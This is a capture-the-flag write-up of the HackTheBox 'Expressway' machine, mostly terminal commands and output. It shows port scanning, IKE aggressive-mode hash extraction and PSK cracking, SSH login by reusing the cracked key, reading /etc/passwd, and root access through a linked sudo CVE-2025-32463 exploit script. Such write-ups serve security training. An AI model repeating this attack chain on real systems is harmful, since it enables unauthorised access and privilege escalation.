Post

HackTheBox ExpressWay Writeup

Posted
By wzwr1029 6 min read

Nmap Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14

┌──(parallels㉿kali-linux-2025-2)-[~/hackthebox/Expressway]
└─$ cat nmap
# Nmap 7.95 scan initiated Sat Sep 27 20:12:43 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.11.87
Nmap scan report for 10.10.11.87
Host is up, received echo-reply ttl 63 (1.9s latency).
Scanned at 2025-09-27 20:12:45 CST for 55s
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 27 20:13:40 2025 -- 1 IP address (1 host up) scanned in 57.59 seconds

Nothing found except ssh services.

UDP Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

┌──(parallels㉿kali-linux-2025-2)-[~/hackthebox/Expressway]
└─$ sudo nmap -sU -Pn -T4 -p 500 10.10.11.87 -vv 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-27 20:32 CST
Initiating Parallel DNS resolution of 1 host. at 20:32
Completed Parallel DNS resolution of 1 host. at 20:32, 0.00s elapsed
Initiating UDP Scan at 20:32
Scanning 10.10.11.87 [1 port]
Discovered open port 500/udp on 10.10.11.87
Completed UDP Scan at 20:32, 1.85s elapsed (1 total ports)
Nmap scan report for 10.10.11.87
Host is up, received user-set (0.98s latency).
Scanned at 2025-09-27 20:32:20 CST for 2s

PORT    STATE SERVICE REASON
500/udp open  isakmp  udp-response ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.94 seconds
           Raw packets sent: 8 (1.124KB) | Rcvd: 7 (604B)

ISAKMP Enumeration

https://www.verylazytech.com/network-pentesting/ipsec-ike-vpn-port-500-udp

Identify VPN Vendor

1
2
3
4
5
6
7
8
9
10
11
12
13
14

┌──(parallels㉿kali-linux-2025-2)-[~/hackthebox/Expressway]
└─$ ike-scan -M -A 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=c53191b4520ab4e2)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.162 seconds (6.16 hosts/sec).  1 returned handshake; 0 returned notify

Extract VPN Group Name & Hash

1
2
3
4
5
6
7
8

┌──(parallels㉿kali-linux-2025-2)-[~/hackthebox/Expressway]
└─$ ike-scan -A --pskcrack 10.10.11.87          
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned HDR=(CKY-R=fd1d61732938254d) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
d91f6597305fc882630dfa015da1e7049d71885b9aa2c767f524264989c22b2251afa0054ed42d0394af873f053fd0e7b3aa9637c68a7bdbcd183c0282e8dc60a29ad8802a002c6be85bd9bc07018e92464a0fbf6c1ef9ab7552c1e2d41f90db254cae60b0ab4c77b01d2f4f7523e6d6ac53b9df8b56fd65ff4325551b2c26fa:4be461c3a37a62f0371ba70411899b9097160e22fa696cb7c89f83ba5e6c50bba5dbcfbd4fdb96d4c8f91782a9697a6ba9f8134c6892e6ec98316673bc369be290d845bb0d122ad3d8997c72f8d9922b1f30f56100f0d958650f57c2c2fdae52b6b0967c28165bc614821422eb15ba82e7926e52de30cd06dbf78766adf4f7b4:fd1d61732938254d:add8d7790a6c770d:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:026352988c5c184e3a88a073c809684848e531f0:378a810047e7cf711803df2003d64b910800a8a100ed5af11f588ab61156388a:06bee8f08d08a1605bc98cca27ac474852d4e2a3
Ending ike-scan 1.9.6: 1 hosts scanned in 0.837 seconds (1.19 hosts/sec).  1 returned handshake; 0 returned notify

Then, we can try to brute force with PSK with psk-crack.

1
2
3
4
5
6

┌──(parallels㉿kali-linux-2025-2)-[~/hackthebox/Expressway]
└─$ psk-crack hashfile.txt -d /usr/share/wordlists/rockyou.txt 
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 06bee8f08d08a1605bc98cca27ac474852d4e2a3
Ending psk-crack: 8045040 iterations in 3.615 seconds (2225413.79 iterations/sec)

Connect with StrongSwan

First, we make changes to two files ipsec.secrets and ipsec.conf.

1
2
3
4
5
6
7
8

# in /etc/ipsec.secrets
# This file holds shared secrets or RSA private keys for authentication.

# RSA private key for this host, authenticating it to any other host
# which knows the public part.

# <kali_ip> <target_ip> : PSK <PSK_SHARED_KEY>
10.10.16.29 10.10.11.87 : PSK "freakingrockstarontheroad"

Then, for the ipsec.conf:

1
2
3
4
5
6
7
8
9
10

conn conceal
        authby=secret
        auto=route
        keyexchange=ikev1
        ike=3des-sha1-modp1024
        left=10.10.16.29
        right=10.10.11.87
        type=transport
        esp=3des-sha1
        rightprotoport=tcp

Finally, we do the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

┌──(parallels㉿kali-linux-2025-2)-[~/hackthebox/Expressway]
└─$ sudo ipsec start        
Starting strongSwan 6.0.2 IPsec [starter]...

┌──(parallels㉿kali-linux-2025-2)-[~/hackthebox/Expressway]
└─$ sudo ipsec up conceal
initiating Main Mode IKE_SA conceal[1] to 10.10.11.87
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.16.29[500] to 10.10.11.87[500] (236 bytes)
received packet: from 10.10.11.87[500] to 10.10.16.29[500] (156 bytes)
parsed ID_PROT response 0 [ SA V V V V ]
received XAuth vendor ID
received DPD vendor ID
received FRAGMENTATION vendor ID
received NAT-T (RFC 3947) vendor ID
selected proposal: IKE:3DES_CBC/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.16.29[500] to 10.10.11.87[500] (244 bytes)
received packet: from 10.10.11.87[500] to 10.10.16.29[500] (244 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH N(INITIAL_CONTACT) ]
sending packet: from 10.10.16.29[500] to 10.10.11.87[500] (100 bytes)
received packet: from 10.10.11.87[500] to 10.10.16.29[500] (84 bytes)
parsed INFORMATIONAL_V1 request 3937470044 [ HASH N(AUTH_FAILED) ]
received AUTHENTICATION_FAILED error notify
establishing connection 'conceal' failed

It failed…

SSH

Since we found a valid username ike when running ike-scan, we can try to use ike:<psk_shared_key> as credentials to login to SSH.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

┌──(parallels㉿kali-linux-2025-2)-[~/hackthebox/Expressway]
└─$ ssh ike@10.10.11.87 
The authenticity of host '10.10.11.87 (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.87' (ED25519) to the list of known hosts.
ike@10.10.11.87's password: 
Last login: Sat Sep 27 13:29:35 BST 2025 from 10.10.14.16 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 27 13:40:11 2025 from 10.10.16.29
ike@expressway:~$

Post-Exploitation

Quick-Check

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

ike@expressway:~$ whoami
ike

ike@expressway:~$ sudo -l
Password: 
Sorry, user ike may not run sudo on expressway.

ike@expressway:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
strongswan:x:102:65534::/var/lib/strongswan:/usr/sbin/nologin
tcpdump:x:103:110::/nonexistent:/usr/sbin/nologin
ike:x:1001:1001:ike,,,:/home/ike:/bin/bash
mysql:x:104:111:MariaDB Server,,,:/nonexistent:/bin/false
tftp:x:105:112:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
Debian-exim:x:106:113::/var/spool/exim4:/usr/sbin/nologin
_laurel:x:999:994::/var/log/laurel:/bin/false

ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)

Huh… we are a member of proxy.

Sudo Vulnerability

https://tp2rc.tanet.edu.tw/node/1102

1
2
3
4
5
6

ike@expressway:/tmp$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

Good, it is vulnerable to CVE-2025-32463, let’s try to search for an exploit script!

https://github.com/mirchr/CVE-2025-32463-sudo-chwoot

1
2
3
4
5
6
7

ike@expressway:~$ ./exp.sh
woot!
root@expressway:/# whoami
root
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
root@expressway:/#
cybersecurity, ctf, htb
pentest cybersecurity ctf htb
This post is licensed under CC BY 4.0 by the author.